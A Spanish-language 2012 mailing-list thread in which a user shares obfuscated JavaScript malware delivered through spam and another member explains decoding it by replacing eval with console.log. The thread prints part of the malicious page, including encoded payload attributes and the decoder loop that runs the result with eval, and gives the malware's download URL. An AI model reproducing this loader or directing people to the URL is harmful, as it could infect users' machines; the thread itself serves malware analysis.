[uylug-varios] ataques curiosos

Kenneth Irving ken at fq.edu.uy
Wed Oct 10 17:57:32 PDT 2012 

Pedro: sí, gracias. Eso es exactamente lo que quería hacer, decodificar el 
archivo y volcarlo a algún lugar, pero no sabía cómo hacerlo con 
javascript! Por eso mandé la consulta, me parecía más rápido que andar 
aprendiendo cómo hacerlo en javascript. ¡gracias!

saludos

Kenneth

On Thu, 11 Oct 2012, Pedro Worcel wrote:

> Hola gente!
> 
> Aprovecho este post para presentarme, soy Pedro, estoy programando ahora en Nueva Zelanda pero me crie en Mercedes, y estudie en la
> UTU. Me paso mi viejo un link de esta conversacion me parecio interesante y ahora me anote para UYLUG. Tambien me anote un poco porque
> me impresiono que se vaya a organizar un evento a nivel Latinoamericano de la OWASP en Montevideo, muy groso.
> 
> La verdad que no entiendo como codifica el malware el javascript, pero no hace falta saberlo porque al final el mismo lo decodifica y
> lo manda a un eval.
> 
> Para poder trabajar con el lo descargue desde la linea de comandos y lo edite con vim. Reemplace todas las ocurrencias de eval por
> console.log y luego copie los contenidos de el firebug en el pastebin y lo hice mas lindo.
> 
> El codigo del malware esta aca:
> 
> http://pastie.org/5032658
> 
> Y adjunto el malware, segun yo, neutralizado. (no garantizo nada eh)
> 
> Saludos!
> Pedro
> 
> ---------- Mensaje reenviado ----------
> De: Kenneth Irving <ken at fq.edu.uy>
> Fecha: 10 de octubre de 2012 19:25
> Asunto: [uylug-varios] ataques curiosos
> Para: UYLUG <uylug-varios at uylug.org.uy>
> 
> 
> 
> Hace un tiempo que de tanto en tanto recibo spam que parece diverso (el último era un boletín de noticias trucho de CNN), pero que
> termina siempre en algo parecido. Son emails que siempre tienen algún link que te baja un HTML que contiene en su interior 3 o 4 links
> que te bajan un código Javascript, que lo único que hace es bajar algún otro archivo, este sí un HTML que contiene el código malicioso
> en javascript.
> 
> Paso el link final para bajar el código malicioso de javascript:
> 
>  http://2.cmisdfoundation.com/links/persons_jobs.php
> 
> y trascribo sólo parte del código. El código comienza con esto:
> 
> ------------------------- comienzo ---------------------------------
> <html><head><title></title></head><body><div
> dqa="asd"></div><script>dd="div";asd=function(){a=a.replace(/[^012a-z3-9]/g,"");}</script><div 58="16#31193r341e*34393m1e36!3f333l3j18^193t3t3331_3k33381836$193r3t3i35(3k3l3i3e10 at 321v331e36&393i3j3k23+38393c341q%3e3l3c3c3t)1c3j353k2j#3k3
> p3c351q*363l3e333k!393f3e1832^1c37193r3m_313i10361t$321e3j3k3p(3c351c311c at 341c331t3k&38393j1r39+3618361616%37193r363f)3i18311t1g#1r311s371e*3
> c353e373k!381r311t31^"
> 44="!38253m353e^3k18123f3e_121b341c33$193t353c3j(353r321t31 at 2r123f3e12&1b342t1r31+2r123f3e12%1b342t1t35)1e3n393e28#313e343c35*3i18331c32!193t3t3t3t^1c3n393e28_313e343c35$3i1q363l3e(333k393f3e at 18341c3319&3r3i353k3l+3i3e10363l%3e333k393f)3e18193r34#18191r3936*1
> 83k3p3g35!3f3610331t^1t12363l3e_333k393f3e$12"
> 49="42e3f34 at 353j2r382t&1r3k3i3p3r+331e3i353d%3f3m352338)393c341837#193t33313k*3338183619!3r3t3t3t39^361833193r_3k3i3p3r34$1e34393m1e(3i353d3f3m at 352338393c&341833193t+33313k3338%1836193r3t)3t3t3t3936#1811341e34*393m193r31!1t343f333l^3d3
> 53e3k1e_37353k253c$353d353e3k(223p293418 at 341e34393m&2924191r39+361831"
> 22="!18331c3219^3t3t3t3t1c_393e393k2j$333i393g3k(1q363l3e33 at 3k393f3e18&193r3m313i+10331t3k38%393j1c311t)3e313m3937#313k3f3i1c*351t121f12!1c361c391t^311e3l3j35_3i2137353e$3k3s3s1212(1c371t311e at 3m353e343f&3i3s3s12
> 12+1c321t311e%3g3c313k36)3f3i3d3s3s#12121c381t*311e3g3i3f!343l333k3s^3s12121r33_1e393e393k$2f"
> ------------------------ [código cortado] ---------------------------
> 
> El bloque de datos codificados continúa, y el archivo termina con esto:
> ------------------------ [continuación] -----------------------------
>  65="53i)23313j3518#191e3i353g*3c31333518
> !1f2s3j1f37^1c1212191r_3h1t361b37$1b17103n39(343k381t12 at 171b3b1e3g&3c3l37393e+2j393q351b%1712103835)3937383k1t#12171b3b1e*3g3c3l3739!3e2j393q
> 
> 35^1b17121017_1r3h1b1t17$3j3k3p3c35(1t12171b39 at 1b1734393j&3g3c313p1q+393e3c393e%351r121017)1r363f3i18#3f1t1g1r3f*1s321e3c35"></div><script>
> if(020==0x10)a=document.getElementsByTagName(dd)[1];
> s="";
> for(i=0;;i++){
>         if(window.document)r=a.getAttribute(i);
>         if(r){s=s+r;}else break;
> }
> a=s;
> asd();
> s="";
> for(i=0;i<a.length;i+=2){
>         s+=String.fromCharCode(parseInt(a.substr(i,2),32));
> }
> c=s;
> e=eval;
> try{if(020==0x10)("321".substr+"zxc")();}catch(gdsgdsg){e(c);}
>                 </script></body></html>
> -------------------- fin -------------------------------
> 
> Esto lo paso sólo como muestra y para no publicar el socotroco completo. Es más práctico simplemente bajarlo desde el link original.
> 
> Es obvio que el bloque de datos codificados e decodificado en el código javascript final, y luego de decodificarlo se ejecuta con el
> "e(c)".
> 
> Imagino que debe tratarse de código javascript ofuscado para explotar alguna debilidad de algún navegador o algún cliente de email,
> pero mis pobres conocimientos de javascript no me han permitido decodificar esto sin riesgo, por lo que lo publico en esta lista, tal
> vez alguien con suficiente curiosidad pueda decodificarlo y hacernos saber de qué se trata. Es simplemente curiosidad, me resultó muy
> interesante el trabajo que se toman para ocultar el código malicioso.
> 
> saludos
> 
>  Kenneth
> _______________________________________________
> Uylug-varios mailing list
> Uylug-varios at listas.uylug.org.uy
> http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
> 
> 
> --
> http://is.gd/droope
> 
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: susp.tar.gz
Type: application/x-gzip
Size: 12684 bytes
Desc: 
URL: <http://listas.uylug.org.uy/pipermail/uylug-varios-uylug.org.uy/attachments/20121010/9ca37a04/attachment-0002.bin>
-------------- next part --------------
_______________________________________________
Uylug-varios mailing list
Uylug-varios at listas.uylug.org.uy
http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy

More information about the Uylug-varios mailing list